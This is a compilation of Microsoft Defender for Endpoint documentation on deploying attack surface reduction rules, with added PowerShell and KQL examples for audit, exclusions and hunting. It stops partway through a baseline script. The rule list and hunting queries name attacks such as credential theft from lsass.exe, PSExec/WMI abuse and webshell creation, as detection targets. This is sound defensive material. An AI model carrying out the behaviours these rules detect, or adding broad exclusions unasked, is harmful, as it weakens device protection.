Use Windows Event Viewer as an alternative to the attack surface reduction rules reporting page in the Microsoft Defender portal

To review apps that would have been blocked, open Event Viewer and filter for Event ID 1121 in the Microsoft-Windows-Windows Defender/Operational log. The following table lists the attack surface reduction rule events.

Event ID   Description
5007       Event when settings are changed
1121       Event when an attack surface reduction rule fires in block mode
1122       Event when an attack surface reduction rule fires in audit mode
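The PowerShell audit-mode cmdlets and the Event Viewer review above can be combined into one script that puts rules into Audit and then summarises the 1121/1122 events per rule, fewest-firing rules first, which is the order the implementation article suggests for moving rules to Block. This is an added example, not code from the Microsoft documentation; it assumes the Defender PowerShell module and an elevated session, the function names are hypothetical, and the three rule GUIDs are the standard protection rules as published in the Attack surface reduction rules reference (they are not listed on this page, so confirm them against the rule-to-GUID matrix before use).

```powershell
# Added example, not part of the Microsoft documentation. Puts a set of ASR rules
# into Audit mode on the local device, then summarises the audit (1122) and block
# (1121) events from the Defender operational log, fewest-firing rules first.
# Assumes the Defender PowerShell module is present and the session is elevated.
# GUIDs below: the standard protection rules as published in the ASR rules
# reference (not on this page); confirm against the rule-to-GUID matrix.
$StandardProtectionRules = @{
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from LSASS'
    '56a863a9-875e-4185-98a7-b882c64b5ce5' = 'Block abuse of exploited vulnerable signed drivers'
    'e6db77e5-3df2-4cf1-b95a-636979351e5b' = 'Block persistence through WMI event subscription'
}

function Get-AsrRuleAction {
    # Returns the configured action code for one rule, or $null if it is unset.
    # Action codes: 0 = Disabled, 1 = Block, 2 = Audit, 6 = Warn.
    param([string]$RuleId)
    $pref = Get-MpPreference
    $ids  = @($pref.AttackSurfaceReductionRules_Ids)
    $acts = @($pref.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        if ($ids[$i] -eq $RuleId) { return [int]$acts[$i] }   # -eq ignores GUID case
    }
    return $null
}

function Set-AsrRulesToAudit {
    param([string[]]$RuleIds)
    foreach ($id in $RuleIds) {
        # Do not silently downgrade a rule that is already enforcing in Block mode.
        if ((Get-AsrRuleAction $id) -eq 1) {
            Write-Warning "Rule $id is already in Block mode; left unchanged."
            continue
        }
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id `
                         -AttackSurfaceReductionRules_Actions AuditMode
    }
}

function Get-AsrEventSummary {
    param([int]$Days = 7)
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1121, 1122
        StartTime = (Get-Date).AddDays(-$Days)
    }
    # Get-WinEvent raises an error when nothing matches; treat that as empty.
    $events = @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)

    $parsed = foreach ($e in $events) {
        # The event text carries "ID: <rule GUID>", "Path: ..." and
        # "Process Name: ..." lines; parse those rather than relying on the
        # positional event properties.
        $ruleId = if ($e.Message -match 'ID:\s*([0-9A-Fa-f-]{36})') { $Matches[1].ToLower() } else { 'unknown' }
        $path   = if ($e.Message -match 'Path:\s*(.+)') { $Matches[1].Trim() } else { '' }
        $proc   = if ($e.Message -match 'Process Name:\s*(.+)') { $Matches[1].Trim() } else { '' }
        [pscustomobject]@{
            Mode    = if ($e.Id -eq 1121) { 'Block' } else { 'Audit' }
            RuleId  = $ruleId
            Path    = $path
            Process = $proc
        }
    }

    # One row per rule and mode; rules with the fewest events come first.
    $parsed | Group-Object RuleId, Mode | ForEach-Object {
        $name = $StandardProtectionRules[$_.Group[0].RuleId]
        [pscustomobject]@{
            RuleId        = $_.Group[0].RuleId
            RuleName      = if ($name) { $name } else { '(see rule-to-GUID matrix)' }
            Mode          = $_.Group[0].Mode
            Events        = $_.Count
            DistinctPaths = @($_.Group.Path | Sort-Object -Unique).Count
            TopProcesses  = (@($_.Group.Process | Group-Object | Sort-Object Count -Descending |
                               Select-Object -First 3 -ExpandProperty Name) -join '; ')
        }
    } | Sort-Object Events
}

Set-AsrRulesToAudit -RuleIds @($StandardProtectionRules.Keys)
Get-AsrEventSummary -Days 7 | Format-Table -AutoSize
```

Run the summary again after a few days of normal use; a rule whose Audit events come only from known update or line-of-business processes is a candidate for an exclusion and then Block, while a rule with many distinct paths needs more investigation first.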

Other articles in this deployment collection

Attack surface reduction rules deployment overview

Plan attack surface reduction rules deployment

Enable attack surface reduction rules

Operationalize attack surface reduction rules

Attack surface reduction rules reference

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.

Implement attack surface reduction rules
Article • 10/02/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Implementing attack surface reduction rules moves the first test ring into an enabled, functional state.

Step 1: Transition attack surface reduction rules from Audit to Block

1. After all exclusions are determined while in audit mode, start setting some attack
surface reduction rules to "block" mode, starting with the rule that has the fewest
triggered events. See Enable attack surface reduction rules.
2. Review the reporting page in the Microsoft Defender portal; see Threat protection
report in Microsoft Defender for Endpoint. Also review feedback from your
champions.
3. Refine exclusions or create new exclusions as determined necessary.
4. Switch problematic rules back to Audit.

Note

For problematic rules (rules creating too much noise), it is better to create exclusions than to turn rules off or switch them back to Audit. You will have to determine what is best for your environment.

Tip

When available, take advantage of the Warn mode setting in rules to limit disruptions. Enabling attack surface reduction rules in Warn mode enables you to capture triggered events and view their potential disruptions, without actually blocking end-user access. Learn more: Warn mode for users.

How does Warn mode work?

Warn mode is effectively a Block instruction, but with the option for the user to
"Unblock" subsequent executions of the given flow or app. Warn mode unblocks on a
per device, user, file and process combination. The warn mode information is stored
locally and has a duration of 24 hours.

Step 2: Expand deployment to ring n + 1

When you're confident that you've correctly configured the attack surface reduction
rules for ring 1, you can widen the scope of your deployment to the next ring (ring n +
1).

The deployment process, steps 1 – 3, is essentially the same for each subsequent ring:

1. Test rules in Audit
2. Review attack surface reduction-triggered audit events in the Microsoft Defender portal
3. Create exclusions
4. Review: refine, add, or remove exclusions as necessary
5. Set rules to "block"
6. Review the reporting page in the Microsoft Defender portal.
7. Create exclusions.
8. Disable problematic rules or switch them back to Audit.

Customize attack surface reduction rules

As you continue to expand your attack surface reduction rules deployment, you may
find it necessary or beneficial to customize the attack surface reduction rules that you've
enabled.

Exclude files and folders

You can choose to exclude files and folders from being evaluated by attack surface
reduction rules. When excluded, the file isn't blocked from running even if an attack
surface reduction rule detects that the file contains malicious behavior.

For example, consider the ransomware rule:

The ransomware rule is designed to help enterprise customers reduce risks of ransomware attacks while ensuring business continuity. By default, the ransomware rule errs on the side of caution and protects against files that haven't yet attained sufficient reputation and trust. To reemphasize, the ransomware rule only triggers on files that haven't gained enough positive reputation and prevalence, based on usage metrics of millions of our customers. Usually, the blocks are self-resolved, because each file's "reputation and trust" values are incrementally upgraded as non-problematic usage increases.

In cases in which blocks aren't self resolved in a timely manner, customers can - at their
own risk - make use of either the self-service mechanism or an Indicator of Compromise
(IOC)-based "allowlist" capability to unblock the files themselves.

Warning

Excluding or unblocking files or folders could potentially allow unsafe files to run
and infect your devices. Excluding files or folders can severely reduce the protection
provided by attack surface reduction rules. Files that would have been blocked by a
rule will be allowed to run, and there will be no report or event recorded.

An exclusion can apply to all rules that allow exclusions or apply to specific rules using
per-rule exclusions. You can specify an individual file, folder path, or the fully qualified
domain name for a resource.

An exclusion is applied only when the excluded application or service starts. For
example, if you add an exclusion for an update service that is already running, the
update service continues to trigger events until the service is stopped and restarted.

Attack surface reduction supports environment variables and wildcards. For information
about using wildcards, see use wildcards in the file name and folder path or extension
exclusion lists. If you're encountering problems with rules detecting files that you believe
shouldn't be detected, use audit mode to test the rule.

See the attack surface reduction rules reference article for details on each rule.

Use Group Policy to exclude files and folders

1. On your Group Policy management computer, open the Group Policy Management
Console , right-click the Group Policy Object you want to configure and select
Edit.

2. In the Group Policy Management Editor, go to Computer configuration and click Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus >
Microsoft Defender Exploit Guard > Attack surface reduction.

4. Double-click the Exclude files and paths from Attack surface reduction Rules
setting and set the option to Enabled. Select Show and enter each file or folder in
the Value name column. Enter 0 in the Value column for each item.

Warning

Do not use quotes as they are not supported for either the Value name column or
the Value column.

Use PowerShell to exclude files and folders

1. Type powershell in the Start menu, right-click Windows PowerShell and select Run
as administrator.

2. Enter the following cmdlet:

PowerShell

Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path or resource>"

Continue to use Add-MpPreference -AttackSurfaceReductionOnlyExclusions to add
more folders to the list.

) Important

Use Add-MpPreference to append or add apps to the list. Using the Set-MpPreference
cmdlet will overwrite the existing list.
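The following script is an added example, not part of the Microsoft article, showing how to apply the Add-MpPreference guidance above without clobbering or duplicating what is already configured. It reads the current ASR-only exclusion list with Get-MpPreference, appends only the paths that are missing, and returns the effective list for review. The Contoso paths are constructed placeholders.

```powershell
# Added example (not from the Microsoft article): add ASR-only exclusions idempotently
# and verify the result. Must run in an elevated PowerShell session on the device.
# The Contoso paths below are constructed placeholders, not real product paths.

function Add-AsrExclusionSafely {
    param([Parameter(Mandatory)][string[]]$Path)

    # Read the exclusion list currently configured on this device. Wrapping in @()
    # handles the case where nothing is configured yet and the property is $null.
    $current = @((Get-MpPreference).AttackSurfaceReductionOnlyExclusions)

    foreach ($p in $Path) {
        if ($current -contains $p) {
            Write-Verbose "Already excluded, skipping: $p"
            continue
        }
        # Add-MpPreference appends to the list. Set-MpPreference with the same
        # parameter would replace the whole list, silently dropping earlier entries.
        Add-MpPreference -AttackSurfaceReductionOnlyExclusions $p
        Write-Verbose "Added exclusion: $p"
    }

    # Return the effective list so it can be reviewed or written to a change record.
    @((Get-MpPreference).AttackSurfaceReductionOnlyExclusions)
}

# Constructed sample entries covering the forms the article accepts:
# a single file, a folder path, and an environment variable with a wildcard.
$exclusions = @(
    'C:\Program Files\Contoso\Updater\ContosoUpdate.exe',
    'C:\Program Files\Contoso\Tools\',
    '%ProgramData%\Contoso\Cache\*.tmp'
)

Add-AsrExclusionSafely -Path $exclusions -Verbose

# To back out an entry later, remove it rather than rewriting the list:
# Remove-MpPreference -AttackSurfaceReductionOnlyExclusions 'C:\Program Files\Contoso\Tools\'
```

Because an exclusion is applied only when the excluded process next starts, a service that is already running keeps generating events until it is restarted, so the returned list confirms configuration, not that events have stopped.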

Use MDM CSPs to exclude files and folders

Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions
configuration service provider (CSP) to add exclusions.

Customize the notification

You can customize the notification for when a rule is triggered and blocks an app or file.
See the Windows Security article.

Additional articles in this deployment collection

Attack surface reduction rules deployment overview

Plan attack surface reduction rules deployment

Test attack surface reduction rules

Operationalize attack surface reduction rules

Attack surface reduction rules reference

See also

Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Operationalize attack surface reduction
rules
Article • 09/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

After you've fully deployed attack surface reduction rules, it's vital that you have
processes in place to monitor and respond to ASR-related activities. Activities include:

Managing ASR rules false positives

False positives/negatives can occur with any threat protection solution. False positives
are cases in which an entity (such as a file or process) is detected and identified as
malicious, although the entity isn't actually a threat. In contrast, a false negative is an
entity that wasn't detected as a threat but is malicious. For more information about false
positives and false negatives, see: Address false positives/negatives in Microsoft
Defender for Endpoint.

Keeping up with ASR rules reports

Consistent, regular review of reports is an essential aspect of maintaining your attack
surface reduction rules deployment and keeping abreast of newly emerging threats.
Your organization should have scheduled reviews of attack surface reduction rules
events on a cadence that keeps current with attack surface reduction rules-reported
events. Depending on the size of your organization, reviews might be daily, hourly, or
continuous monitoring.

ASR rules Advanced Hunting

One of the most powerful features of Microsoft Defender XDR is advanced hunting. If
you're not familiar with advanced hunting, see: Proactively hunt for threats with
advanced hunting.

Advanced hunting is a query-based (Kusto Query Language) threat-hunting tool that
lets you explore up to 30 days of the captured data. Through advanced hunting, you can
proactively inspect events in order to locate interesting indicators and entities. The
flexible access to data facilitates unconstrained hunting for both known and potential
threats.

Through advanced hunting, it's possible to extract attack surface reduction rules
information, create reports, and get in-depth information on the context of a given
attack surface reduction rule audit or block event.

You can query attack surface reduction rule events from the DeviceEvents table in the
advanced hunting section of the Microsoft Defender portal. For example, the following
query shows how to report all the events that have attack surface reduction rules as data
source, for the last 30 days. The query then summarizes by the ActionType count with
the name of the attack surface reduction rule.

Attack surface reduction events shown in the advanced hunting portal are throttled to
unique processes seen every hour. The time of the attack surface reduction event is the
first time the event is seen within that hour.

Kusto

DeviceEvents
| where Timestamp > ago(30d)
| where ActionType startswith "Asr"
| summarize EventCount=count() by ActionType

The above shows that 187 events were registered for AsrLsassCredentialTheft:

102 for Blocked
85 for Audited

Two events for AsrOfficeChildProcess (1 for Audited and 1 for Block)
Eight events for AsrPsexecWmiChildProcessAudited

If you want to focus on the AsrOfficeChildProcess rule and get details on the actual files
and processes involved, change the filter for ActionType and replace the summarize line
with a projection of the wanted fields (in this case they're DeviceName, FileName,
FolderPath, etc.).

Kusto

DeviceEvents
| where Timestamp > ago(30d)
// Column names are case-sensitive in KQL; the prefix matches both the Audited and Blocked action types
| where ActionType startswith "AsrOfficeChildProcess"
// AdditionalFields is a JSON string; the rule GUID lives under the RuleId key
| extend RuleId = extractjson("$.RuleId", AdditionalFields, typeof(string))
| project Timestamp, DeviceName, ActionType, RuleId, FileName, FolderPath, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessCommandLine


The true benefit of advanced hunting is that you can shape the queries to your liking. By
shaping your query you can see the exact story of what was happening, regardless of
whether you want to pinpoint something on an individual machine, or you want to
extract insights from your entire environment.

For more information about hunting options, see: Demystifying attack surface reduction
rules - Part 3 .
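As an added example that is not part of the Microsoft article, the script below runs the same ASR hunting query shape through the Defender for Endpoint Advanced Hunting API (POST to https://api.securitycenter.microsoft.com/api/advancedqueries/run) and then applies a simple review rule to the rows that come back. It assumes $AccessToken is a bearer token for an Entra app registration holding the AdvancedQuery.Read.All permission (token acquisition is outside the snippet), and that the RuleId key is present in AdditionalFields. The sample rows are constructed so the review logic can be exercised without a tenant.

```powershell
# Added example (not from the Microsoft article). Assumptions: $AccessToken carries
# AdvancedQuery.Read.All; the AdditionalFields JSON on ASR events has a RuleId key.

function Invoke-AsrHunt {
    param(
        [Parameter(Mandatory)][string]$AccessToken,
        [int]$Days = 30,
        [string]$ActionTypePrefix = 'Asr'     # narrow to e.g. 'AsrOfficeChildProcess'
    )

    # Same shape as the article's query, summarized per rule and initiating process so
    # that a noisy line-of-business binary stands out from one-off detections.
    $query = @"
DeviceEvents
| where Timestamp > ago(${Days}d)
| where ActionType startswith "$ActionTypePrefix"
| extend RuleId = tostring(parse_json(AdditionalFields).RuleId)
| summarize EventCount = count(), Devices = dcount(DeviceId)
    by ActionType, RuleId, InitiatingProcessFileName
| order by EventCount desc
"@

    $body = @{ Query = $query } | ConvertTo-Json
    $response = Invoke-RestMethod -Method Post `
        -Uri 'https://api.securitycenter.microsoft.com/api/advancedqueries/run' `
        -Headers @{ Authorization = "Bearer $AccessToken"; 'Content-Type' = 'application/json' } `
        -Body $body

    # The API returns the result rows under the Results property.
    $response.Results
}

# Review rule: audited events that recur at volume from a single initiating process are
# the false-positive candidates to examine before a rule is moved from Audit to Block.
function Get-AsrReviewCandidates {
    param([Parameter(Mandatory)][object[]]$Rows, [int]$MinEvents = 50)
    $Rows |
        Where-Object { $_.ActionType -like '*Audited' -and $_.EventCount -ge $MinEvents } |
        Sort-Object EventCount -Descending |
        Select-Object ActionType, RuleId, InitiatingProcessFileName, EventCount, Devices
}

# Constructed sample rows in the shape of the API's Results array (not real tenant data).
$sample = @(
    [pscustomobject]@{ ActionType = 'AsrLsassCredentialTheftAudited'; RuleId = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'
                       InitiatingProcessFileName = 'contosoagent.exe'; EventCount = 85; Devices = 40 },
    [pscustomobject]@{ ActionType = 'AsrLsassCredentialTheftBlocked'; RuleId = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'
                       InitiatingProcessFileName = 'unknown.exe'; EventCount = 102; Devices = 3 },
    [pscustomobject]@{ ActionType = 'AsrOfficeChildProcessAudited'; RuleId = 'd4f940ab-401b-4efc-aadc-ad5f3c50688a'
                       InitiatingProcessFileName = 'winword.exe'; EventCount = 1; Devices = 1 }
)

# Offline run against the constructed rows; with a token, replace $sample by
# (Invoke-AsrHunt -AccessToken $AccessToken -ActionTypePrefix 'AsrLsassCredentialTheft').
Get-AsrReviewCandidates -Rows $sample | Format-Table -AutoSize
```

Of the three constructed rows only the contosoagent.exe audit row passes the review filter; the Blocked row is excluded by design, since blocks are outcomes to investigate rather than exclusion candidates, and the single winword.exe event falls under the volume threshold.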

Articles in this deployment collection

Attack surface reduction rules deployment overview

Plan attack surface reduction rules deployment

Test attack surface reduction rules

Enable attack surface reduction rules

Attack surface reduction rules reference


Attack surface reduction rules reference
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms:

Windows

This article provides information about Microsoft Defender for Endpoint attack surface
reduction rules (ASR rules):

ASR rules supported operating system versions
ASR rules supported configuration management systems
Per ASR rule alert and notification details
ASR rule to GUID matrix
ASR rule modes
Per-rule descriptions

) Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Attack surface reduction rules by type

Attack surface reduction rules are categorized as one of two types:

Standard protection rules: Are the minimum set of rules which Microsoft
recommends you always enable, while you are evaluating the impact and
configuration needs of the other ASR rules. These rules typically have minimal-to-
no noticeable impact on the end user.

Other rules: Rules which require some measure of following the documented
deployment steps [Plan > Test (audit) > Enable (block/warn modes)], as
documented in the Attack surface reduction rules deployment guide

For the easiest method to enable the standard protection rules, see: Simplified standard
protection option.

Rule name | Standard protection rule? | Other rule?
Block abuse of exploited vulnerable signed drivers | Yes |
Block Adobe Reader from creating child processes | | Yes
Block all Office applications from creating child processes | | Yes
Block credential stealing from the Windows local security authority subsystem (lsass.exe) | Yes |
Block executable content from email client and webmail | | Yes
Block executable files from running unless they meet a prevalence, age, or trusted list criterion | | Yes
Block execution of potentially obfuscated scripts | | Yes
Block JavaScript or VBScript from launching downloaded executable content | | Yes
Block Office applications from creating executable content | | Yes
Block Office applications from injecting code into other processes | | Yes
Block Office communication application from creating child processes | | Yes
Block persistence through WMI event subscription | Yes |
Block process creations originating from PSExec and WMI commands | | Yes
Block rebooting machine in Safe Mode (preview) | | Yes
Block untrusted and unsigned processes that run from USB | | Yes
Block use of copied or impersonated system tools (preview) | | Yes
Block Webshell creation for Servers | | Yes
Block Win32 API calls from Office macros | | Yes
Use advanced protection against ransomware | | Yes

Microsoft Defender Antivirus exclusions and ASR rules

Microsoft Defender Antivirus exclusions apply to some Microsoft Defender for Endpoint
capabilities, such as some of the attack surface reduction rules.

The following ASR rules DO NOT honor Microsoft Defender Antivirus exclusions:

Block Adobe Reader from creating child processes
Block process creations originating from PSExec and WMI commands
Block credential stealing from the Windows local security authority subsystem (lsass.exe)
Block Office applications from creating executable content
Block Office applications from injecting code into other processes
Block Office communication application from creating child processes

7 Note

For information about configuring per-rule exclusions, see the section titled
Configure ASR rules per-rule exclusions in the topic Test attack surface reduction
rules.

ASR rules supported operating systems

The following table lists the supported operating systems for rules that are currently
released to general availability. The rules are listed in alphabetical order in this table.

7 Note

Unless otherwise indicated, the minimum Windows 10 build is version 1709 (RS3,
build 16299) or later; the minimum Windows Server build is version 1809 or later.

Attack surface reduction rules in Windows Server 2012 R2 and
Windows Server 2016 are available for devices onboarded using the modern
unified solution package. For more information, see New functionality in the
modern unified solution for Windows Server 2012 R2 and 2016 Preview.

Rule name | Windows 11 and Windows 10 | Windows Server 2022 and Windows Server 2019 | Windows Server | Windows Server 2016 [1, 2] | Windows Server 2012 R2 [1, 2]
Block abuse of exploited vulnerable signed drivers | Y, version 1803 (Semi-Annual Enterprise Channel) or later | Y | Y | Y | Y
Block Adobe Reader from creating child processes | Y, version 1809 or later [3] | Y | Y | Y | Y
Block all Office applications from creating child processes | Y | Y | Y | Y | Y
Block credential stealing from the Windows local security authority subsystem (lsass.exe) | Y, version 1803 or later [3] | Y | Y | Y | Y
Block executable content from email client and webmail | Y | Y | Y | Y | Y
Block executable files from running unless they meet a prevalence, age, or trusted list criterion | Y, version 1803 or later [3] | Y | Y | Y | Y
Block execution of potentially obfuscated scripts | Y | Y | Y | Y | Y
Block JavaScript or VBScript from launching downloaded executable content | Y | Y | Y | N | Y
Block Office applications from creating executable content | Y | Y | Y | Y | Y
Block Office applications from injecting code into other processes | Y | Y | Y | Y | Y
Block Office communication application from creating child processes | Y | Y | Y | Y | Y
Block persistence through Windows Management Instrumentation (WMI) event subscription | Y, version 1903 (build 18362) or later [3] | Y, version 1903 (build 18362) or later | Y | N | Y
Block process creations originating from PSExec and WMI commands | Y, version 1803 or later [3] | Y | Y | Y | Y
Block rebooting machine in Safe Mode (preview) | Y | Y | Y | Y | Y
Block untrusted and unsigned processes that run from USB | Y | Y | Y | Y | Y
Block use of copied or impersonated system tools (preview) | Y | Y | Y | Y | Y
Block Webshell creation for Servers | N | Y, Exchange Role Only | Y, Exchange Role Only | Y, Exchange Role Only | N
Block Win32 API calls from Office macros | Y | N | N | N | N
Use advanced protection against ransomware | Y, version 1803 or later [3] | Y | Y | Y | Y

(1) Refers to the modern unified solution for Windows Server 2012 and 2016. For more
information, see Onboard Windows Servers to the Defender for Endpoint service.

(2) For Windows Server 2016 and Windows Server 2012 R2, the minimum required
version of Microsoft Endpoint Configuration Manager is version 2111.

(3) Version and build number apply only to Windows 10.

ASR rules supported configuration management systems

Links to information about configuration management system versions referenced in
this table are listed below this table.

Rule name | Microsoft Intune | Microsoft Endpoint Configuration Manager | Group Policy [1] | PowerShell [1]
Block abuse of exploited vulnerable signed drivers | Y | | Y | Y
Block Adobe Reader from creating child processes | Y | | Y | Y
Block all Office applications from creating child processes | Y | Y, CB 1710 | Y | Y
Block credential stealing from the Windows local security authority subsystem (lsass.exe) | Y | Y, CB 1802 | Y | Y
Block executable content from email client and webmail | Y | Y, CB 1710 | Y | Y
Block executable files from running unless they meet a prevalence, age, or trusted list criterion | Y | Y, CB 1802 | Y | Y
Block execution of potentially obfuscated scripts | Y | Y, CB 1710 | Y | Y
Block JavaScript or VBScript from launching downloaded executable content | Y | Y, CB 1710 | Y | Y
Block Office applications from creating executable content | Y | Y, CB 1710 | Y | Y
Block Office applications from injecting code into other processes | Y | Y, CB 1710 | Y | Y
Block Office communication application from creating child processes | Y | Y, CB 1710 | Y | Y
Block persistence through WMI event subscription | Y | | Y | Y
Block process creations originating from PSExec and WMI commands | Y | | Y | Y
Block rebooting machine in Safe Mode (preview) | Y | | Y | Y
Block untrusted and unsigned processes that run from USB | Y | Y, CB 1802 | Y | Y
Block use of copied or impersonated system tools (preview) | Y | | Y | Y
Block Webshell creation for Servers | Y | | Y | Y
Block Win32 API calls from Office macros | Y | Y, CB 1710 | Y | Y
Use advanced protection against ransomware | Y | Y, CB 1802 | Y | Y

(1) You can configure attack surface reduction rules on a per-rule basis by using any
rule's GUID.

Configuration Manager CB 1710
Configuration Manager CB 1802
Microsoft Configuration Manager CB 1710
System Center Configuration Manager (SCCM) CB 1710
SCCM is now Microsoft Configuration Manager.

Per ASR rule alert and notification details

Toast notifications are generated for all rules in Block mode. Rules in any other mode
won't generate toast notifications.

For rules with the "Rule State" specified:

ASR rules with <ASR Rule, Rule State> combinations are used to surface alerts
(toast notifications) on Microsoft Defender for Endpoint only for devices at cloud
block level High. Devices not at High cloud block level won't generate alerts for
any <ASR Rule, Rule State> combinations
EDR alerts are generated for ASR rules in the specified states, for devices at cloud
block level High+

Rule name | Rule state | Generates alerts in EDR? (only for devices at cloud block level High+) | Generates toast notifications? (in Block mode only, and only for devices at cloud block level High)
Block abuse of exploited vulnerable signed drivers | | N | Y
Block Adobe Reader from creating child processes | Block | Y | Y
Block all Office applications from creating child processes | | N | Y
Block credential stealing from the Windows local security authority subsystem (lsass.exe) | | N | Y
Block executable content from email client and webmail | | Y | Y
Block executable files from running unless they meet a prevalence, age, or trusted list criterion | | N | Y
Block execution of potentially obfuscated scripts | Audit, Block | Audit: Y, Block: Y | Audit: N, Block: Y
Block JavaScript or VBScript from launching downloaded executable content | Block | Y | Y
Block Office applications from creating executable content | | N | Y
Block Office applications from injecting code into other processes | | N | Y
Block Office communication application from creating child processes | | N | Y
Block persistence through WMI event subscription | Audit, Block | Audit: Y, Block: Y | Audit: N, Block: Y
Block process creations originating from PSExec and WMI commands | | N | Y
Block rebooting machine in Safe Mode (preview) | | N | N
Block untrusted and unsigned processes that run from USB | Audit, Block | Audit: Y, Block: Y | Audit: N, Block: Y
Block use of copied or impersonated system tools (preview) | | N | N
Block Webshell creation for Servers | | N | N
Block Win32 API calls from Office macros | | N | Y
Use advanced protection against ransomware | Audit, Block | Audit: Y, Block: Y | Audit: N, Block: Y

ASR rule to GUID matrix

Rule name | Rule GUID
Block abuse of exploited vulnerable signed drivers | 56a863a9-875e-4185-98a7-b882c64b5ce5
Block Adobe Reader from creating child processes | 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
Block all Office applications from creating child processes | d4f940ab-401b-4efc-aadc-ad5f3c50688a
Block credential stealing from the Windows local security authority subsystem (lsass.exe) | 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
Block executable content from email client and webmail | be9ba2d9-53ea-4cdc-84e5-9b1eeee46550
Block executable files from running unless they meet a prevalence, age, or trusted list criterion | 01443614-cd74-433a-b99e-2ecdc07bfc25
Block execution of potentially obfuscated scripts | 5beb7efe-fd9a-4556-801d-275e5ffc04cc
Block JavaScript or VBScript from launching downloaded executable content | d3e037e1-3eb8-44c8-a917-57927947596d
Block Office applications from creating executable content | 3b576869-a4ec-4529-8536-b80a7769e899
Block Office applications from injecting code into other processes | 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84
Block Office communication application from creating child processes | 26190899-1602-49e8-8b27-eb1d0a1ce869
Block persistence through WMI event subscription * | e6db77e5-3df2-4cf1-b95a-636979351e5b
Block process creations originating from PSExec and WMI commands | d1e49aac-8f56-4280-b9ba-993a6d77406c
Block rebooting machine in Safe Mode (preview) | 33ddedf1-c6e0-47cb-833e-de6133960387
Block untrusted and unsigned processes that run from USB | b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4
Block use of copied or impersonated system tools (preview) | c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb
Block Webshell creation for Servers | a8f5898e-1dc8-49a9-9878-85004b8a61e6
Block Win32 API calls from Office macros | 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b
Use advanced protection against ransomware | c1db55ab-c21a-4637-bb3f-a12568109d35

* File and folder exclusions not supported.

ASR rule modes

Not configured or Disable: The state in which the ASR rule hasn't been enabled or
has been disabled. The code for this state is 0.
Block: The state in which the ASR rule is enabled. The code for this state is 1.
Audit: The state in which the ASR rule is evaluated for the effect it would have on
the organization or environment if enabled (set to block or warn). The code for this
state is 2.
Warn: The state in which the ASR rule is enabled and presents a notification to the
end-user, but permits the end-user to bypass the block. The code for this state is 6.

Warn mode is a block-mode type that alerts users about potentially risky actions. Users
can choose to bypass the block warning message and allow the underlying action. Users
can select OK to enforce the block, or select the bypass option - Unblock - through the
end-user pop-up toast notification that is generated at the time of the block. After the
warning is unblocked, the operation is allowed until the next time the warning message
occurs, at which time the end-user will need to reperform the action.

When the allow button is clicked, the block will be suppressed for 24 hours. After 24
hours, the end-user will need to allow the block again. The warn mode for ASR rules is
only supported for RS5+ (1809+) devices. If bypass is assigned to ASR rules on devices
with older versions, the rule will be in blocked mode.

You can also set a rule in warn mode via PowerShell by specifying the
AttackSurfaceReductionRules_Actions as "Warn". For example:

PowerShell

Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Warn
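The script below is an added example, not from the Microsoft article, that extends the single-rule cmdlet above to a small baseline: the standard protection rules in Block, two rules in Audit for evaluation, and one in Warn, and then reads the configuration back and decodes the state codes listed above (0, 1, 2, 6). The GUIDs are the ones in the ASR rule to GUID matrix; which rules go into which mode is an assumption chosen for illustration, not a Microsoft recommendation. The build check for Warn mode uses 17763, the build number of Windows 10 version 1809 (RS5).

```powershell
# Added example (not from the Microsoft article): apply an ASR baseline with PowerShell and
# verify the configured state codes. Run in an elevated session. The grouping of rules into
# modes below is an illustrative assumption.

# GUIDs as listed in the ASR rule to GUID matrix.
$StandardProtectionRules = @(
    '56a863a9-875e-4185-98a7-b882c64b5ce5',  # Block abuse of exploited vulnerable signed drivers
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2',  # Block credential stealing from LSASS
    'e6db77e5-3df2-4cf1-b95a-636979351e5b'   # Block persistence through WMI event subscription
)
$AuditFirstRules = @(
    'd4f940ab-401b-4efc-aadc-ad5f3c50688a',  # Block all Office applications from creating child processes
    '5beb7efe-fd9a-4556-801d-275e5ffc04cc'   # Block execution of potentially obfuscated scripts
)
$WarnRules = @(
    'b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4'   # Block untrusted and unsigned processes that run from USB
)

# State codes from the "ASR rule modes" list.
$ModeNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

function Set-AsrBaseline {
    # Warn mode is supported on RS5 (1809, build 17763) and later; on older builds the
    # article says a Warn assignment behaves as Block, so set Block explicitly there.
    $warnAction = if ([Environment]::OSVersion.Version.Build -ge 17763) { 'Warn' } else { 'Block' }

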